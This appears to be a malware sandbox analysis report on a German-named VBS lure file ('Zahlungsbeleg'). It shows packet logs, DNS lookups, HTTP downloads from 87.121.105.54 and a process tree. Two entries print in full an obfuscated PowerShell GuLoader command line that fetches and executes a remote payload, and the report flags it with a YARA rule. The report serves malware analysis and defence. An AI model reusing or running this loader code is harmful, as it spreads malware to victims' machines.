                          May 4, 2024 09:52:13.598529100 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.598553896 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.598644018 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.598644018 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.905087948 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905109882 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905145884 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.905179024 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.905227900 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905242920 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905265093 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905277014 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.905277967 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905292988 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.905292988 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905308962 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905318022 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.905322075 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905335903 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.905339956 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905354023 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905365944 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905375957 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.905380011 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905392885 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905404091 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.905409098 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905422926 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905424118 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.905452967 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.905472040 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.905853033 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905894995 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.905898094 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905922890 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.905931950 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.905966997 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.906121016 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.906163931 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.212652922 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.212680101 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.212708950 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.212769032 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.212888956 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.212924004 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.212943077 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.212980032 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213013887 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213021994 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213026047 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213040113 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213052988 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213056087 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213067055 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213072062 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213088989 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213202000 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213219881 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213223934 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213232040 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213238001 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213255882 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213259935 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213277102 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213284969 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213295937 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213304043 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213311911 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213320017 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213330030 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213334084 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213349104 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213351011 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213365078 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213419914 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213434935 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213434935 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213453054 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213455915 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213469028 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213470936 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213485003 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213485956 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213502884 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.213505030 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213521004 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.213522911 CEST804973787.121.105.54192.168.2.4
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          May 4, 2024 09:51:32.153351068 CEST | 63806 | 53 | 192.168.2.4 | 1.1.1.1
                          May 4, 2024 09:51:32.314074993 CEST | 53 | 63806 | 1.1.1.1 | 192.168.2.4

                          Timestamp | Source IP | Dest IP | Checksum | Code | Type
                          May 4, 2024 09:51:32.324956894 CEST | 192.168.2.4 | 142.250.72.174 | 4d5a | | Echo
                          May 4, 2024 09:51:32.484157085 CEST | 142.250.72.174 | 192.168.2.4 | 555a | | Echo Reply

                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          May 4, 2024 09:51:32.153351068 CEST | 192.168.2.4 | 1.1.1.1 | 0xb1fd | Standard query (0) | google.com | A (IP address) | IN (0x0001) | false

                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          May 4, 2024 09:51:29.243855953 CEST | 1.1.1.1 | 192.168.2.4 | 0xfde9 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                          May 4, 2024 09:51:29.243855953 CEST | 1.1.1.1 | 192.168.2.4 | 0xfde9 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                          May 4, 2024 09:51:32.314074993 CEST | 1.1.1.1 | 192.168.2.4 | 0xb1fd | No error (0) | google.com | | 142.250.72.174 | A (IP address) | IN (0x0001) | false

                          • 87.121.105.54
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.4 | 49731 | 87.121.105.54 | 80 | 7316 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                          Timestamp | Bytes transferred | Direction | Data
                          May 4, 2024 09:51:39.030721903 CEST | 172 | OUT | GET /Oxaluria209.smi HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                          Host: 87.121.105.54
                          Connection: Keep-Alive
                          May 4, 2024 09:51:39.338871956 CEST | 1289 | IN | HTTP/1.1 200 OK
                          Date: Sat, 04 May 2024 07:51:39 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Fri, 03 May 2024 09:05:28 GMT
                          ETag: "65b90-617890559e600"
                          Accept-Ranges: bytes
                          Content-Length: 416656
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/smil+xml


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.4 | 49737 | 87.121.105.54 | 80 | 7948 | C:\Program Files (x86)\Windows Mail\wab.exe

                          Timestamp | Bytes transferred | Direction | Data
                          May 4, 2024 09:52:13.286463976 CEST | 174 | OUT | GET /vKdsOriqv105.bin HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                          Host: 87.121.105.54
                          Cache-Control: no-cache
                          May 4, 2024 09:52:13.597558975 CEST | 1289 | IN | HTTP/1.1 200 OK
                          Date: Sat, 04 May 2024 07:52:13 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Fri, 03 May 2024 09:02:07 GMT
                          ETag: "42040-61788f95ee1c0"
                          Accept-Ranges: bytes
                          Content-Length: 270400
                          Content-Type: application/octet-stream


                          Target ID:0
                          Start time:09:51:27
                          Start date:04/05/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs"
                          Imagebase:0x7ff6e0830000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:1
                          Start time:09:51:31
                          Start date:04/05/2024
                          Path:C:\Windows\System32\PING.EXE
                          Wow64 process (32bit):false
                          Commandline:ping google.com -n 1
                          Imagebase:0x7ff6ac150000
                          File size:22'528 bytes
                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:2
                          Start time:09:51:31
                          Start date:04/05/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:09:51:31
                          Start date:04/05/2024
                          Path:C:\Windows\System32\PING.EXE
                          Wow64 process (32bit):false
                          Commandline:ping %.%.%.%
                          Imagebase:0x7ff6ac150000
                          File size:22'528 bytes
                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:4
                          Start time:09:51:31
                          Start date:04/05/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:09:51:32
                          Start date:04/05/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\cmd.exe /c dir
                          Imagebase:0x7ff7d21a0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:6
                          Start time:09:51:32
                          Start date:04/05/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:09:51:33
                          Start date:04/05/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. 
jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.bal L.vn:Sta iFThyreroplbeeSherieRefinlValgbaRetinnbevi,cvar.ee SaagrN ninsC.ook= SurfNLkkereTribuwSk am-Tire OUnprobEidesjBitumeStyrmckor otSurm. 
HjagtSBle.iy SupesUnsu.tTilkeeMak rmPlta.. LmmeNTela,e UnvetPrvel. VegeWmeniseKiwieb ReupC AntilUnsa.iSpe ieVint nTeglvta alo ');biblioteksfilerne (Tyknende '.nfan$ DeusFFam,lr TiggeThodueIndsalLeakia Helln.ortvc udvaeH nstrVolumsMe.le.,ekonHO.stdeRedera VinedDiftoeBasrerSeculsGaast[Gidse$BaadsPRadiorAp.thi.ublem Out.e DybsvnoncoaCarpolLimitl.istayPassu]Start=Obser$TermiUEdsafdHoboesbetitkRigdoi AnaplPatrul remseju.aesUenig ');$Naturtr=Tyknende ' ArabFI dder Unhee ExtreAfsvkls.epnaHo monAlbincIntegeForvar bekms Gr,p.Adju D no coInsu.wEtabln B.valAn icoOrenjaStj.rdBegreFGrundiP,efalU,vuleKrigs( Hydr$ba,reDFoldaiTorpeeGauffnRefle,Robin$GematoMalesvExtrae omarstramdVagtmrMatt,ythion)Hagta ';$Naturtr=$Titar[1]+$Naturtr;$overdry=$Titar[0];biblioteksfilerne (Tyknende 'Respi$Unling ,haklSanitoImmunbKoereaCortel Wise:.hmsmESta.ls TanztAd.omhF imreSommesGiganiDkfaboBitism,chelemi,rot Fr,srHomelyPos e1Unruf7Ne,to6 Anti=Alter(UncliTF,agmeBordesTzaritMarse-CoccoPPolyea Catat BesthAfliv Arbej$FestioMyriavIsraeeWal,arPaatrdCountr roreyPaasy)Sivap ');while (!$Esthesiometry176) {biblioteksfilerne (Tyknende 'S vsk$,nequgSkindlDummeoSyst bMote.aStereladmir:Maro L MaraeStrghvProp ePhot.mHoneya DryanB,rkndNeg.rsOve v= s.id$C asstUn eurPreinu SkraeI,gtt ') ;biblioteksfilerne $Naturtr;biblioteksfilerne (Tyknende 'FradrS,rakvtDentnaAbdicrRec mt,dult-BashfSSaltblSaddeeRukaneTen.epHerop Srgem4Bakov ');biblioteksfilerne (Tyknende 'pulve$Extrag TolllRubasoEsotebUenigaafgrel.alad: HvsnEPustesB,mbltSidsthEspoueServisunnaki FdevoGuldsmExpuneTravet EmnerSov kyPo.tl1De.el7 Co r6Ha ay= O.pl(I,venT Svi,eForplsFds etVinte-Ke,tsPper,daPerittRhodehSjatt Firaa$ForsyoUnhusvRe,ece Ant,rH.mogdDese r Wo,syInter)A,fri ') ;biblioteksfilerne (Tyknende 'Reg,s$Kemikg Duv.lHeno,oUnideb Ho.kaMa telNonev: popSAp oceBrassp DiaktbarkeiBeskrs.rnseyClinil SkatlHyperaCharmb ChrolDy.ehesi if=Strej$ cla,gDemesl D buoBedlabNarkoaBardulViles:Arb.jC Lagra F.agtU.hunt.enselRingleChan.gSvrdla,aveetC,cobeTelen1Aden 
+Penan+Nause%Ridde$Vak.eFOkariaSt ute OverrFestsdRetspiMiljagSpads. Therc Fi eoPerjuuStikknFrem.tEnsn ') ;$Dien=$Faerdig[$Septisyllable];}biblioteksfilerne (Tyknende 'Multi$UnsuigMicrolStumpoL icibRevleaBogydlCont :PotomFned.roBedu,s PowesBat hePre,crKybel gasbl= Trai estheGAnimee eizit kemi- NonjCB,ldioRet hnGaasetara,ieRrelsnTjlestExcub Sator$KonduoLitt.vBepapeH,emmrIntemdSeniarAfkray Male ');biblioteksfilerne (Tyknende 'Nonde$ByretgBrugslEvacuoTjenebDadelaOpk elUdsen: A chP For.otranssT rteiDkstitLovgiiUds ro ,rilnSlidssFri,tao,erdnG,dfrgJaskei AcnevInconebyltelMattbsR,vene esmo .aret=,orsk Acaro[VestaS Un.ryHe.tasSa met.renieEvalum,ontr. .echCHarbro Mun nAsc.ivTopngeBolsjr Ko mtEpico]React:Mange: DecaFGamogr Ud.eomik om ermiBd.sseaTornesSpendeSe.su6 Jock4nonniSSny etTreetrMerc iProren nfeagPlica(Surpl$tidehFCodoro ellsHvirvsFlutee De,irUndow)Count ');biblioteksfilerne (Tyknende 'Synsp$Siccig Ca dlTa,sto.rolebNogleaRenholStagn:B rfoDNordbeScrimlKro.seTropog KisteSilverBoghve Afbrt Sel mRembudB.dgeeunglor Puka ,rvle=Moder Marqu[to,roSPartiy KaolsSnibbtNonioe ,nibmUnbef.Af lrTGgegeeHushaxBord,tNonv,. ubsaESforzn Illuc posio SkuldCo upiYppetnSabbigNorde]Norda:,unkt:CustoA yveSEfterCFortsIS entIAnusi.Ska,tGPeccaeVeiletTovtrSTin ltBrummr DialiN,nrenslvfegSten,(Vrdia$ V deP T,rooAcyansOateriTramwt PoleiSixpeoBevirn FestsA.eolaUndebnNonprg plebiCog.ov,rovie S.mil.oglesMentaeHello)Ratif ');biblioteksfilerne (Tyknende 'Junni$ForhagGieselJoyproMedlbb Ultia Umynl emin:AaremBFernaiVernansljferty,edePneums sinu=Knogl$ForpaDSphegeTra ilvers.eVrikdgNord,e Frosr OdoneZombitS,rtemStipud trope Rejnr ,eli.AriadsTypoguV.ntubCephasResidt yprer ProfiNonnenHoe.lgKonfe(Ceilo2Bgesp8Advi 4 Anra0Contr2 Uove1Admin, S dd2 Opsl8Drfta4 B,ho7 Medi1Biolu)Novit ');biblioteksfilerne $Binres;"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:true

                          Target ID:8
                          Start time:09:51:33
                          Start date:04/05/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:9
                          Start time:09:51:37
                          Start date:04/05/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"
                          Imagebase:0x7ff7d21a0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:10
                          Start time:09:51:44
                          Start date:04/05/2024
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. 
jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.bal L.vn:Sta iFThyreroplbeeSherieRefinlValgbaRetinnbevi,cvar.ee SaagrN ninsC.ook= SurfNLkkereTribuwSk am-Tire OUnprobEidesjBitumeStyrmckor otSurm. 
